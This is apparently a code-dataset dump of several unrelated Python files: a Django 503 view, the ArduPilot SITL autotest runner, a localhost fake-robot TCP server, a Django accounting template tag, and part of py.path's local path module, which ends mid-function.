code
stringlengths 1
199k
|
|---|
from django.template import Context, loader
from maintenancemode import http
def temporary_unavailable(request, template_name='503.html'):
"""
Default 503 handler, which looks for the requested URL in the redirects
table, redirects if found, and displays 404 page if not redirected.
Templates: `503.html`
Context:
request_path
The path of the requested URL (e.g., '/app/pages/bad_page/')
"""
t = loader.get_template(template_name) # You need to create a 503.html template.
return http.HttpResponseTemporaryUnavailable(t.render(Context({})))
|
"""
APM automatic test suite
Andrew Tridgell, October 2011
"""
import atexit
import fnmatch
import glob
import optparse
import os
import shutil
import signal
import sys
import time
import traceback
import apmrover2
import arducopter
import arduplane
import quadplane
from pysim import util
os.environ['PYTHONUNBUFFERED'] = '1'
os.putenv('TMPDIR', util.reltopdir('tmp'))
def get_default_params(atype, binary):
"""Get default parameters."""
# use rover simulator so SITL is not starved of input
from pymavlink import mavutil
HOME = mavutil.location(40.071374969556928, -105.22978898137808, 1583.702759, 246)
if binary.find("plane") != -1 or binary.find("rover") != -1:
frame = "rover"
else:
frame = "+"
home = "%f,%f,%u,%u" % (HOME.lat, HOME.lng, HOME.alt, HOME.heading)
sitl = util.start_SITL(binary, wipe=True, model=frame, home=home, speedup=10, unhide_parameters=True)
mavproxy = util.start_MAVProxy_SITL(atype)
print("Dumping defaults")
idx = mavproxy.expect(['Please Run Setup', 'Saved [0-9]+ parameters to (\S+)'])
if idx == 0:
# we need to restart it after eeprom erase
util.pexpect_close(mavproxy)
util.pexpect_close(sitl)
sitl = util.start_SITL(binary, model=frame, home=home, speedup=10)
mavproxy = util.start_MAVProxy_SITL(atype)
idx = mavproxy.expect('Saved [0-9]+ parameters to (\S+)')
parmfile = mavproxy.match.group(1)
dest = util.reltopdir('../buildlogs/%s-defaults.parm' % atype)
shutil.copy(parmfile, dest)
util.pexpect_close(mavproxy)
util.pexpect_close(sitl)
print("Saved defaults for %s to %s" % (atype, dest))
return True
def build_all():
"""Run the build_all.sh script."""
print("Running build_all.sh")
if util.run_cmd(util.reltopdir('Tools/scripts/build_all.sh'), directory=util.reltopdir('.')) != 0:
print("Failed build_all.sh")
return False
return True
def build_binaries():
"""Run the build_binaries.sh script."""
print("Running build_binaries.sh")
import shutil
# copy the script as it changes git branch, which can change the script while running
orig = util.reltopdir('Tools/scripts/build_binaries.sh')
copy = util.reltopdir('./build_binaries.sh')
shutil.copyfile(orig, copy)
shutil.copymode(orig, copy)
if util.run_cmd(copy, directory=util.reltopdir('.')) != 0:
print("Failed build_binaries.sh")
return False
return True
def build_devrelease():
"""Run the build_devrelease.sh script."""
print("Running build_devrelease.sh")
import shutil
# copy the script as it changes git branch, which can change the script while running
orig = util.reltopdir('Tools/scripts/build_devrelease.sh')
copy = util.reltopdir('./build_devrelease.sh')
shutil.copyfile(orig, copy)
shutil.copymode(orig, copy)
if util.run_cmd(copy, directory=util.reltopdir('.')) != 0:
print("Failed build_devrelease.sh")
return False
return True
def build_examples():
"""Build examples."""
for target in 'px4-v2', 'navio':
print("Running build.examples for %s" % target)
try:
util.build_examples(target)
except Exception as e:
print("Failed build_examples on board=%s" % target)
print(str(e))
return False
return True
def build_parameters():
"""Run the param_parse.py script."""
print("Running param_parse.py")
if util.run_cmd(util.reltopdir('Tools/autotest/param_metadata/param_parse.py'), directory=util.reltopdir('.')) != 0:
print("Failed param_parse.py")
return False
return True
def convert_gpx():
"""Convert any tlog files to GPX and KML."""
import glob
mavlog = glob.glob(util.reltopdir("../buildlogs/*.tlog"))
for m in mavlog:
util.run_cmd(util.reltopdir("modules/mavlink/pymavlink/tools/mavtogpx.py") + " --nofixcheck " + m)
gpx = m + '.gpx'
kml = m + '.kml'
util.run_cmd('gpsbabel -i gpx -f %s -o kml,units=m,floating=1,extrude=1 -F %s' % (gpx, kml), checkfail=False)
util.run_cmd('zip %s.kmz %s.kml' % (m, m), checkfail=False)
util.run_cmd("mavflightview.py --imagefile=%s.png %s" % (m, m))
return True
def test_prerequisites():
"""Check we have the right directories and tools to run tests."""
print("Testing prerequisites")
util.mkdir_p(util.reltopdir('../buildlogs'))
return True
def alarm_handler(signum, frame):
"""Handle test timeout."""
global results, opts
try:
results.add('TIMEOUT', '<span class="failed-text">FAILED</span>', opts.timeout)
util.pexpect_close_all()
convert_gpx()
write_fullresults()
os.killpg(0, signal.SIGKILL)
except Exception:
pass
sys.exit(1)
parser = optparse.OptionParser("autotest")
parser.add_option("--skip", type='string', default='', help='list of steps to skip (comma separated)')
parser.add_option("--list", action='store_true', default=False, help='list the available steps')
parser.add_option("--viewerip", default=None, help='IP address to send MAVLink and fg packets to')
parser.add_option("--map", action='store_true', default=False, help='show map')
parser.add_option("--experimental", default=False, action='store_true', help='enable experimental tests')
parser.add_option("--timeout", default=3000, type='int', help='maximum runtime in seconds')
parser.add_option("--valgrind", default=False, action='store_true', help='run ArduPilot binaries under valgrind')
parser.add_option("--gdb", default=False, action='store_true', help='run ArduPilot binaries under gdb')
parser.add_option("--debug", default=False, action='store_true', help='make built binaries debug binaries')
parser.add_option("-j", default=None, type='int', help='build CPUs')
opts, args = parser.parse_args()
steps = [
'prerequisites',
'build.All',
'build.Binaries',
# 'build.DevRelease',
'build.Examples',
'build.Parameters',
'build.ArduPlane',
'defaults.ArduPlane',
'fly.ArduPlane',
'fly.QuadPlane',
'build.APMrover2',
'defaults.APMrover2',
'drive.APMrover2',
'build.ArduCopter',
'defaults.ArduCopter',
'fly.ArduCopter',
'build.Helicopter',
'fly.CopterAVC',
'build.AntennaTracker',
'convertgpx',
]
skipsteps = opts.skip.split(',')
signal.signal(signal.SIGALRM, alarm_handler)
signal.alarm(opts.timeout)
if opts.list:
for step in steps:
print(step)
sys.exit(0)
def skip_step(step):
"""See if a step should be skipped."""
for skip in skipsteps:
if fnmatch.fnmatch(step.lower(), skip.lower()):
return True
return False
def binary_path(step, debug=False):
if step.find("ArduCopter") != -1:
binary_name = "arducopter-quad"
elif step.find("ArduPlane") != -1:
binary_name = "arduplane"
elif step.find("APMrover2") != -1:
binary_name = "ardurover"
elif step.find("AntennaTracker") != -1:
binary_name = "antennatracker"
elif step.find("CopterAVC") != -1:
binary_name = "arducopter-heli"
elif step.find("QuadPlane") != -1:
binary_name = "arduplane"
else:
# cope with builds that don't have a specific binary
return None
if debug:
binary_basedir = "sitl-debug"
else:
binary_basedir = "sitl"
binary = util.reltopdir(os.path.join('build', binary_basedir, 'bin', binary_name))
if not os.path.exists(binary):
if os.path.exists(binary + ".exe"):
binary += ".exe"
else:
raise ValueError("Binary (%s) does not exist" % (binary,))
return binary
def run_step(step):
"""Run one step."""
# remove old logs
util.run_cmd('/bin/rm -f logs/*.BIN logs/LASTLOG.TXT')
if step == "prerequisites":
return test_prerequisites()
if step == 'build.ArduPlane':
return util.build_SITL('bin/arduplane', j=opts.j, debug=opts.debug)
if step == 'build.APMrover2':
return util.build_SITL('bin/ardurover', j=opts.j, debug=opts.debug)
if step == 'build.ArduCopter':
return util.build_SITL('bin/arducopter-quad', j=opts.j, debug=opts.debug)
if step == 'build.AntennaTracker':
return util.build_SITL('bin/antennatracker', j=opts.j, debug=opts.debug)
if step == 'build.Helicopter':
return util.build_SITL('bin/arducopter-heli', j=opts.j, debug=opts.debug)
binary = binary_path(step, debug=opts.debug)
if step == 'defaults.ArduPlane':
return get_default_params('ArduPlane', binary)
if step == 'defaults.ArduCopter':
return get_default_params('ArduCopter', binary)
if step == 'defaults.APMrover2':
return get_default_params('APMrover2', binary)
if step == 'fly.ArduCopter':
return arducopter.fly_ArduCopter(binary, viewerip=opts.viewerip, use_map=opts.map, valgrind=opts.valgrind, gdb=opts.gdb)
if step == 'fly.CopterAVC':
return arducopter.fly_CopterAVC(binary, viewerip=opts.viewerip, use_map=opts.map, valgrind=opts.valgrind, gdb=opts.gdb)
if step == 'fly.ArduPlane':
return arduplane.fly_ArduPlane(binary, viewerip=opts.viewerip, use_map=opts.map, valgrind=opts.valgrind, gdb=opts.gdb)
if step == 'fly.QuadPlane':
return quadplane.fly_QuadPlane(binary, viewerip=opts.viewerip, use_map=opts.map, valgrind=opts.valgrind, gdb=opts.gdb)
if step == 'drive.APMrover2':
return apmrover2.drive_APMrover2(binary, viewerip=opts.viewerip, use_map=opts.map, valgrind=opts.valgrind, gdb=opts.gdb)
if step == 'build.All':
return build_all()
if step == 'build.Binaries':
return build_binaries()
if step == 'build.DevRelease':
return build_devrelease()
if step == 'build.Examples':
return build_examples()
if step == 'build.Parameters':
return build_parameters()
if step == 'convertgpx':
return convert_gpx()
raise RuntimeError("Unknown step %s" % step)
class TestResult(object):
"""Test result class."""
def __init__(self, name, result, elapsed):
self.name = name
self.result = result
self.elapsed = "%.1f" % elapsed
class TestFile(object):
"""Test result file."""
def __init__(self, name, fname):
self.name = name
self.fname = fname
class TestResults(object):
"""Test results class."""
def __init__(self):
self.date = time.asctime()
self.githash = util.run_cmd('git rev-parse HEAD', output=True, directory=util.reltopdir('.')).strip()
self.tests = []
self.files = []
self.images = []
def add(self, name, result, elapsed):
"""Add a result."""
self.tests.append(TestResult(name, result, elapsed))
def addfile(self, name, fname):
"""Add a result file."""
self.files.append(TestFile(name, fname))
def addimage(self, name, fname):
"""Add a result image."""
self.images.append(TestFile(name, fname))
def addglob(self, name, pattern):
"""Add a set of files."""
import glob
for f in glob.glob(util.reltopdir('../buildlogs/%s' % pattern)):
self.addfile(name, os.path.basename(f))
def addglobimage(self, name, pattern):
"""Add a set of images."""
import glob
for f in glob.glob(util.reltopdir('../buildlogs/%s' % pattern)):
self.addimage(name, os.path.basename(f))
def write_webresults(results_to_write):
"""Write webpage results."""
from pymavlink.generator import mavtemplate
t = mavtemplate.MAVTemplate()
for h in glob.glob(util.reltopdir('Tools/autotest/web/*.html')):
html = util.loadfile(h)
f = open(util.reltopdir("../buildlogs/%s" % os.path.basename(h)), mode='w')
t.write(f, html, results_to_write)
f.close()
for f in glob.glob(util.reltopdir('Tools/autotest/web/*.png')):
shutil.copy(f, util.reltopdir('../buildlogs/%s' % os.path.basename(f)))
def write_fullresults():
"""Write out full results set."""
global results
results.addglob("Google Earth track", '*.kmz')
results.addfile('Full Logs', 'autotest-output.txt')
results.addglob('DataFlash Log', '*-log.bin')
results.addglob("MAVLink log", '*.tlog')
results.addglob("GPX track", '*.gpx')
results.addfile('ArduPlane build log', 'ArduPlane.txt')
results.addfile('ArduPlane code size', 'ArduPlane.sizes.txt')
results.addfile('ArduPlane stack sizes', 'ArduPlane.framesizes.txt')
results.addfile('ArduPlane defaults', 'default_params/ArduPlane-defaults.parm')
results.addglob("ArduPlane log", 'ArduPlane-*.BIN')
results.addglob("ArduPlane core", 'ArduPlane.core')
results.addglob("ArduPlane ELF", 'ArduPlane.elf')
results.addfile('ArduCopter build log', 'ArduCopter.txt')
results.addfile('ArduCopter code size', 'ArduCopter.sizes.txt')
results.addfile('ArduCopter stack sizes', 'ArduCopter.framesizes.txt')
results.addfile('ArduCopter defaults', 'default_params/ArduCopter-defaults.parm')
results.addglob("ArduCopter log", 'ArduCopter-*.BIN')
results.addglob("ArduCopter core", 'ArduCopter.core')
results.addglob("ArduCopter elf", 'ArduCopter.elf')
results.addglob("CopterAVC log", 'CopterAVC-*.BIN')
results.addglob("CopterAVC core", 'CopterAVC.core')
results.addfile('APMrover2 build log', 'APMrover2.txt')
results.addfile('APMrover2 code size', 'APMrover2.sizes.txt')
results.addfile('APMrover2 stack sizes', 'APMrover2.framesizes.txt')
results.addfile('APMrover2 defaults', 'default_params/APMrover2-defaults.parm')
results.addglob("APMrover2 log", 'APMrover2-*.BIN')
results.addglob("APMrover2 core", 'APMrover2.core')
results.addglob("APMrover2 ELF", 'APMrover2.elf')
results.addfile('AntennaTracker build log', 'AntennaTracker.txt')
results.addfile('AntennaTracker code size', 'AntennaTracker.sizes.txt')
results.addfile('AntennaTracker stack sizes', 'AntennaTracker.framesizes.txt')
results.addglob("AntennaTracker ELF", 'AntennaTracker.elf')
results.addglob('APM:Libraries documentation', 'docs/libraries/index.html')
results.addglob('APM:Plane documentation', 'docs/ArduPlane/index.html')
results.addglob('APM:Copter documentation', 'docs/ArduCopter/index.html')
results.addglob('APM:Rover documentation', 'docs/APMrover2/index.html')
results.addglobimage("Flight Track", '*.png')
write_webresults(results)
results = TestResults()
def check_logs(step):
"""Check for log files from a step."""
print("check step: ", step)
if step.startswith('fly.'):
vehicle = step[4:]
elif step.startswith('drive.'):
vehicle = step[6:]
else:
return
logs = glob.glob("logs/*.BIN")
for log in logs:
bname = os.path.basename(log)
newname = util.reltopdir("../buildlogs/%s-%s" % (vehicle, bname))
print("Renaming %s to %s" % (log, newname))
os.rename(log, newname)
corefile = "core"
if os.path.exists(corefile):
newname = util.reltopdir("../buildlogs/%s.core" % vehicle)
print("Renaming %s to %s" % (corefile, newname))
os.rename(corefile, newname)
util.run_cmd('/bin/cp A*/A*.elf ../buildlogs', directory=util.reltopdir('.'))
def run_tests(steps):
"""Run a list of steps."""
global results
passed = True
failed = []
for step in steps:
util.pexpect_close_all()
if skip_step(step):
continue
t1 = time.time()
print(">>>> RUNNING STEP: %s at %s" % (step, time.asctime()))
try:
if not run_step(step):
print(">>>> FAILED STEP: %s at %s" % (step, time.asctime()))
passed = False
failed.append(step)
results.add(step, '<span class="failed-text">FAILED</span>', time.time() - t1)
continue
except Exception as msg:
passed = False
failed.append(step)
print(">>>> FAILED STEP: %s at %s (%s)" % (step, time.asctime(), msg))
traceback.print_exc(file=sys.stdout)
results.add(step, '<span class="failed-text">FAILED</span>', time.time() - t1)
check_logs(step)
continue
results.add(step, '<span class="passed-text">PASSED</span>', time.time() - t1)
print(">>>> PASSED STEP: %s at %s" % (step, time.asctime()))
check_logs(step)
if not passed:
print("FAILED %u tests: %s" % (len(failed), failed))
util.pexpect_close_all()
write_fullresults()
return passed
util.mkdir_p(util.reltopdir('../buildlogs'))
lckfile = util.reltopdir('../buildlogs/autotest.lck')
lck = util.lock_file(lckfile)
if lck is None:
print("autotest is locked - exiting. lckfile=(%s)" % (lckfile,))
sys.exit(0)
atexit.register(util.pexpect_close_all)
if len(args) > 0:
# allow a wildcard list of steps
matched = []
for a in args:
arg_matched = False
for s in steps:
if fnmatch.fnmatch(s.lower(), a.lower()):
matched.append(s)
arg_matched = True
if not arg_matched:
print("No steps matched argument ({})".format(a))
sys.exit(1)
steps = matched
try:
if not run_tests(steps):
sys.exit(1)
except KeyboardInterrupt:
util.pexpect_close_all()
sys.exit(1)
except Exception:
# make sure we kill off any children
util.pexpect_close_all()
raise
|
import socket
import threading
import socketserver
import time
class RequestHandler(socketserver.BaseRequestHandler):
#def __init__(self, *args, **kwargs):
#print(self, *args, **kwargs)
#print("Got connection from {}".format( self.client_address[0]) )
#socketserver.BaseRequestHandler.__init__(self, *args, **kwargs)
def handle(self):
while True:
data = str(self.request.recv(1024), 'ascii')
cur_thread = threading.current_thread()
print("{} received {} from {}".format(cur_thread.name, data, self.client_address) )
if data == "":
return
#when this methods returns, the connection to the client closes
def setup(self):
print("Got new connection from {}".format( self.client_address) )
self.server.handlers.append(self)
def finish(self):
print("Connection from {} lost".format( self.client_address) )
self.server.handlers.remove(self)
class Server(socketserver.ThreadingMixIn, socketserver.TCPServer):
def init(self):
"""
__init__ should not be overriden
"""
self.handlers = []
def close(self):
for handler in self.handlers:
handler.request.shutdown(socket.SHUT_RDWR)
handler.request.close()
self.shutdown()
class FakeRobot(object):
def run(self):
host = "localhost"
port = 30002
server = Server((host, port), RequestHandler)
server.init()
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
print("Fake Universal robot running at ", host, port)
try:
f = open("packet.bin", "rb")
packet = f.read()
f.close()
while True:
time.sleep(0.09) #The real robot published data 10 times a second
for handler in server.handlers:
handler.request.sendall(packet)
finally:
print("Shutting down server")
server.close()
if __name__ == "__main__":
r = FakeRobot()
r.run()
|
from django.template import Library
register = Library()
@register.inclusion_tag("accountings/acct_entry_item.html", takes_context=True)
def acct_entry_item(context, acct_entry, entry_class=''):
#from tendenci.apps.accountings.models import AcctTran
acct_trans = acct_entry.trans.all()
# calculate the total_debit and total_credit and update the context
for acct_tran in acct_trans:
if acct_tran.amount > 0:
context['total_debit'] += acct_tran.amount
if acct_tran.amount < 0:
context['total_credit'] += abs(acct_tran.amount)
context.update({
'acct_trans': acct_trans,
'entry_class': entry_class
})
return context
|
"""
local path implementation.
"""
from __future__ import with_statement
from contextlib import contextmanager
import sys, os, re, atexit, io
import py
from py._path import common
from py._path.common import iswin32, fspath
from stat import S_ISLNK, S_ISDIR, S_ISREG
from os.path import abspath, normcase, normpath, isabs, exists, isdir, isfile, islink, dirname
if sys.version_info > (3,0):
def map_as_list(func, iter):
return list(map(func, iter))
else:
map_as_list = map
class Stat(object):
def __getattr__(self, name):
return getattr(self._osstatresult, "st_" + name)
def __init__(self, path, osstatresult):
self.path = path
self._osstatresult = osstatresult
@property
def owner(self):
if iswin32:
raise NotImplementedError("XXX win32")
import pwd
entry = py.error.checked_call(pwd.getpwuid, self.uid)
return entry[0]
@property
def group(self):
""" return group name of file. """
if iswin32:
raise NotImplementedError("XXX win32")
import grp
entry = py.error.checked_call(grp.getgrgid, self.gid)
return entry[0]
def isdir(self):
return S_ISDIR(self._osstatresult.st_mode)
def isfile(self):
return S_ISREG(self._osstatresult.st_mode)
def islink(self):
st = self.path.lstat()
return S_ISLNK(self._osstatresult.st_mode)
class PosixPath(common.PathBase):
def chown(self, user, group, rec=0):
""" change ownership to the given user and group.
user and group may be specified by a number or
by a name. if rec is True change ownership
recursively.
"""
uid = getuserid(user)
gid = getgroupid(group)
if rec:
for x in self.visit(rec=lambda x: x.check(link=0)):
if x.check(link=0):
py.error.checked_call(os.chown, str(x), uid, gid)
py.error.checked_call(os.chown, str(self), uid, gid)
def readlink(self):
""" return value of a symbolic link. """
return py.error.checked_call(os.readlink, self.strpath)
def mklinkto(self, oldname):
""" posix style hard link to another name. """
py.error.checked_call(os.link, str(oldname), str(self))
def mksymlinkto(self, value, absolute=1):
""" create a symbolic link with the given value (pointing to another name). """
if absolute:
py.error.checked_call(os.symlink, str(value), self.strpath)
else:
base = self.common(value)
# with posix local paths '/' is always a common base
relsource = self.__class__(value).relto(base)
reldest = self.relto(base)
n = reldest.count(self.sep)
target = self.sep.join(('..', )*n + (relsource, ))
py.error.checked_call(os.symlink, target, self.strpath)
def getuserid(user):
import pwd
if not isinstance(user, int):
user = pwd.getpwnam(user)[2]
return user
def getgroupid(group):
import grp
if not isinstance(group, int):
group = grp.getgrnam(group)[2]
return group
FSBase = not iswin32 and PosixPath or common.PathBase
class LocalPath(FSBase):
""" object oriented interface to os.path and other local filesystem
related information.
"""
class ImportMismatchError(ImportError):
""" raised on pyimport() if there is a mismatch of __file__'s"""
sep = os.sep
class Checkers(common.Checkers):
def _stat(self):
try:
return self._statcache
except AttributeError:
try:
self._statcache = self.path.stat()
except py.error.ELOOP:
self._statcache = self.path.lstat()
return self._statcache
def dir(self):
return S_ISDIR(self._stat().mode)
def file(self):
return S_ISREG(self._stat().mode)
def exists(self):
return self._stat()
def link(self):
st = self.path.lstat()
return S_ISLNK(st.mode)
def __init__(self, path=None, expanduser=False):
""" Initialize and return a local Path instance.
Path can be relative to the current directory.
If path is None it defaults to the current working directory.
If expanduser is True, tilde-expansion is performed.
Note that Path instances always carry an absolute path.
Note also that passing in a local path object will simply return
the exact same path object. Use new() to get a new copy.
"""
if path is None:
self.strpath = py.error.checked_call(os.getcwd)
else:
try:
path = fspath(path)
except TypeError:
raise ValueError("can only pass None, Path instances "
"or non-empty strings to LocalPath")
if expanduser:
path = os.path.expanduser(path)
self.strpath = abspath(path)
def __hash__(self):
return hash(self.strpath)
def __eq__(self, other):
s1 = fspath(self)
try:
s2 = fspath(other)
except TypeError:
return False
if iswin32:
s1 = s1.lower()
try:
s2 = s2.lower()
except AttributeError:
return False
return s1 == s2
def __ne__(self, other):
return not (self == other)
def __lt__(self, other):
return fspath(self) < fspath(other)
def __gt__(self, other):
return fspath(self) > fspath(other)
def samefile(self, other):
""" return True if 'other' references the same file as 'self'.
"""
other = fspath(other)
if not isabs(other):
other = abspath(other)
if self == other:
return True
if iswin32:
return False # there is no samefile
return py.error.checked_call(
os.path.samefile, self.strpath, other)
def remove(self, rec=1, ignore_errors=False):
""" remove a file or directory (or a directory tree if rec=1).
if ignore_errors is True, errors while removing directories will
be ignored.
"""
if self.check(dir=1, link=0):
if rec:
# force remove of readonly files on windows
if iswin32:
self.chmod(0o700, rec=1)
py.error.checked_call(py.std.shutil.rmtree, self.strpath,
ignore_errors=ignore_errors)
else:
py.error.checked_call(os.rmdir, self.strpath)
else:
if iswin32:
self.chmod(0o700)
py.error.checked_call(os.remove, self.strpath)
def computehash(self, hashtype="md5", chunksize=524288):
""" return hexdigest of hashvalue for this file. """
try:
try:
import hashlib as mod
except ImportError:
if hashtype == "sha1":
hashtype = "sha"
mod = __import__(hashtype)
hash = getattr(mod, hashtype)()
except (AttributeError, ImportError):
raise ValueError("Don't know how to compute %r hash" %(hashtype,))
f = self.open('rb')
try:
while 1:
buf = f.read(chunksize)
if not buf:
return hash.hexdigest()
hash.update(buf)
finally:
f.close()
def new(self, **kw):
""" create a modified version of this path.
the following keyword arguments modify various path parts::
a:/some/path/to/a/file.ext
xx drive
xxxxxxxxxxxxxxxxx dirname
xxxxxxxx basename
xxxx purebasename
xxx ext
"""
obj = object.__new__(self.__class__)
if not kw:
obj.strpath = self.strpath
return obj
drive, dirname, basename, purebasename,ext = self._getbyspec(
"drive,dirname,basename,purebasename,ext")
if 'basename' in kw:
if 'purebasename' in kw or 'ext' in kw:
raise ValueError("invalid specification %r" % kw)
else:
pb = kw.setdefault('purebasename', purebasename)
try:
ext = kw['ext']
except KeyError:
pass
else:
if ext and not ext.startswith('.'):
ext = '.' + ext
kw['basename'] = pb + ext
if ('dirname' in kw and not kw['dirname']):
kw['dirname'] = drive
else:
kw.setdefault('dirname', dirname)
kw.setdefault('sep', self.sep)
obj.strpath = normpath(
"%(dirname)s%(sep)s%(basename)s" % kw)
return obj
def _getbyspec(self, spec):
""" see new for what 'spec' can be. """
res = []
parts = self.strpath.split(self.sep)
args = filter(None, spec.split(',') )
append = res.append
for name in args:
if name == 'drive':
append(parts[0])
elif name == 'dirname':
append(self.sep.join(parts[:-1]))
else:
basename = parts[-1]
if name == 'basename':
append(basename)
else:
i = basename.rfind('.')
if i == -1:
purebasename, ext = basename, ''
else:
purebasename, ext = basename[:i], basename[i:]
if name == 'purebasename':
append(purebasename)
elif name == 'ext':
append(ext)
else:
raise ValueError("invalid part specification %r" % name)
return res
def dirpath(self, *args, **kwargs):
""" return the directory path joined with any given path arguments. """
if not kwargs:
path = object.__new__(self.__class__)
path.strpath = dirname(self.strpath)
if args:
path = path.join(*args)
return path
return super(LocalPath, self).dirpath(*args, **kwargs)
def join(self, *args, **kwargs):
""" return a new path by appending all 'args' as path
components. if abs=1 is used restart from root if any
of the args is an absolute path.
"""
sep = self.sep
strargs = [fspath(arg) for arg in args]
strpath = self.strpath
if kwargs.get('abs'):
newargs = []
for arg in reversed(strargs):
if isabs(arg):
strpath = arg
strargs = newargs
break
newargs.insert(0, arg)
for arg in strargs:
arg = arg.strip(sep)
if iswin32:
# allow unix style paths even on windows.
arg = arg.strip('/')
arg = arg.replace('/', sep)
strpath = strpath + sep + arg
obj = object.__new__(self.__class__)
obj.strpath = normpath(strpath)
return obj
def open(self, mode='r', ensure=False, encoding=None):
""" return an opened file with the given mode.
If ensure is True, create parent directories if needed.
"""
if ensure:
self.dirpath().ensure(dir=1)
if encoding:
return py.error.checked_call(io.open, self.strpath, mode, encoding=encoding)
return py.error.checked_call(open, self.strpath, mode)
def _fastjoin(self, name):
child = object.__new__(self.__class__)
child.strpath = self.strpath + self.sep + name
return child
def islink(self):
return islink(self.strpath)
def check(self, **kw):
if not kw:
return exists(self.strpath)
if len(kw) == 1:
if "dir" in kw:
return not kw["dir"] ^ isdir(self.strpath)
if "file" in kw:
return not kw["file"] ^ isfile(self.strpath)
return super(LocalPath, self).check(**kw)
_patternchars = set("*?[" + os.path.sep)
def listdir(self, fil=None, sort=None):
""" list directory contents, possibly filter by the given fil func
and possibly sorted.
"""
if fil is None and sort is None:
names = py.error.checked_call(os.listdir, self.strpath)
return map_as_list(self._fastjoin, names)
if isinstance(fil, py.builtin._basestring):
if not self._patternchars.intersection(fil):
child = self._fastjoin(fil)
if exists(child.strpath):
return [child]
return []
fil = common.FNMatcher(fil)
names = py.error.checked_call(os.listdir, self.strpath)
res = []
for name in names:
child = self._fastjoin(name)
if fil is None or fil(child):
res.append(child)
self._sortlist(res, sort)
return res
def size(self):
""" return size of the underlying file object """
return self.stat().size
def mtime(self):
""" return last modification time of the path. """
return self.stat().mtime
def copy(self, target, mode=False, stat=False):
""" copy path to target.
If mode is True, will copy copy permission from path to target.
If stat is True, copy permission, last modification
time, last access time, and flags from path to target.
"""
if self.check(file=1):
if target.check(dir=1):
target = target.join(self.basename)
assert self!=target
copychunked(self, target)
if mode:
copymode(self.strpath, target.strpath)
if stat:
copystat(self, target)
else:
def rec(p):
return p.check(link=0)
for x in self.visit(rec=rec):
relpath = x.relto(self)
newx = target.join(relpath)
newx.dirpath().ensure(dir=1)
if x.check(link=1):
newx.mksymlinkto(x.readlink())
continue
elif x.check(file=1):
copychunked(x, newx)
elif x.check(dir=1):
newx.ensure(dir=1)
if mode:
copymode(x.strpath, newx.strpath)
if stat:
copystat(x, newx)
def rename(self, target):
""" rename this path to target. """
target = fspath(target)
return py.error.checked_call(os.rename, self.strpath, target)
def dump(self, obj, bin=1):
""" pickle object into path location"""
f = self.open('wb')
try:
py.error.checked_call(py.std.pickle.dump, obj, f, bin)
finally:
f.close()
def mkdir(self, *args):
""" create & return the directory joined with args. """
p = self.join(*args)
py.error.checked_call(os.mkdir, fspath(p))
return p
def write_binary(self, data, ensure=False):
""" write binary data into path. If ensure is True create
missing parent directories.
"""
if ensure:
self.dirpath().ensure(dir=1)
with self.open('wb') as f:
f.write(data)
def write_text(self, data, encoding, ensure=False):
""" write text data into path using the specified encoding.
If ensure is True create missing parent directories.
"""
if ensure:
self.dirpath().ensure(dir=1)
with self.open('w', encoding=encoding) as f:
f.write(data)
def write(self, data, mode='w', ensure=False):
""" write data into path. If ensure is True create
missing parent directories.
"""
if ensure:
self.dirpath().ensure(dir=1)
if 'b' in mode:
if not py.builtin._isbytes(data):
raise ValueError("can only process bytes")
else:
if not py.builtin._istext(data):
if not py.builtin._isbytes(data):
data = str(data)
else:
data = py.builtin._totext(data, sys.getdefaultencoding())
f = self.open(mode)
try:
f.write(data)
finally:
f.close()
def _ensuredirs(self):
parent = self.dirpath()
if parent == self:
return self
if parent.check(dir=0):
parent._ensuredirs()
if self.check(dir=0):
try:
self.mkdir()
except py.error.EEXIST:
# race condition: file/dir created by another thread/process.
# complain if it is not a dir
if self.check(dir=0):
raise
return self
def ensure(self, *args, **kwargs):
""" ensure that an args-joined path exists (by default as
a file). if you specify a keyword argument 'dir=True'
then the path is forced to be a directory path.
"""
p = self.join(*args)
if kwargs.get('dir', 0):
return p._ensuredirs()
else:
p.dirpath()._ensuredirs()
if not p.check(file=1):
p.open('w').close()
return p
def stat(self, raising=True):
""" Return an os.stat() tuple. """
if raising == True:
return Stat(self, py.error.checked_call(os.stat, self.strpath))
try:
return Stat(self, os.stat(self.strpath))
except KeyboardInterrupt:
raise
except Exception:
return None
def lstat(self):
""" Return an os.lstat() tuple. """
return Stat(self, py.error.checked_call(os.lstat, self.strpath))
def setmtime(self, mtime=None):
""" set modification time for the given path. if 'mtime' is None
(the default) then the file's mtime is set to current time.
Note that the resolution for 'mtime' is platform dependent.
"""
if mtime is None:
return py.error.checked_call(os.utime, self.strpath, mtime)
try:
return py.error.checked_call(os.utime, self.strpath, (-1, mtime))
except py.error.EINVAL:
return py.error.checked_call(os.utime, self.strpath, (self.atime(), mtime))
def chdir(self):
""" change directory to self and return old current directory """
try:
old = self.__class__()
except py.error.ENOENT:
old = None
py.error.checked_call(os.chdir, self.strpath)
return old
@contextmanager
def as_cwd(self):
""" return context manager which changes to current dir during the
managed "with" context. On __enter__ it returns the old dir.
"""
old = self.chdir()
try:
yield old
finally:
old.chdir()
def realpath(self):
""" return a new path which contains no symbolic links."""
return self.__class__(os.path.realpath(self.strpath))
def atime(self):
""" return last access time of the path. """
return self.stat().atime
def __repr__(self):
return 'local(%r)' % self.strpath
def __str__(self):
""" return string representation of the Path. """
return self.strpath
def chmod(self, mode, rec=0):
""" change permissions to the given mode. If mode is an
integer it directly encodes the os-specific modes.
if rec is True perform recursively.
"""
if not isinstance(mode, int):
raise TypeError("mode %r must be an integer" % (mode,))
if rec:
for x in self.visit(rec=rec):
py.error.checked_call(os.chmod, str(x), mode)
py.error.checked_call(os.chmod, self.strpath, mode)
def pypkgpath(self):
""" return the Python package path by looking for the last
directory upwards which still contains an __init__.py.
Return None if a pkgpath can not be determined.
"""
pkgpath = None
for parent in self.parts(reverse=True):
if parent.isdir():
if not parent.join('__init__.py').exists():
break
if not isimportable(parent.basename):
break
pkgpath = parent
return pkgpath
def _ensuresyspath(self, ensuremode, path):
if ensuremode:
s = str(path)
if ensuremode == "append":
if s not in sys.path:
sys.path.append(s)
else:
if s != sys.path[0]:
sys.path.insert(0, s)
def pyimport(self, modname=None, ensuresyspath=True):
""" return path as an imported python module.
If modname is None, look for the containing package
and construct an according module name.
The module will be put/looked up in sys.modules.
if ensuresyspath is True then the root dir for importing
the file (taking __init__.py files into account) will
be prepended to sys.path if it isn't there already.
If ensuresyspath=="append" the root dir will be appended
if it isn't already contained in sys.path.
if ensuresyspath is False no modification of syspath happens.
"""
if not self.check():
raise py.error.ENOENT(self)
pkgpath = None
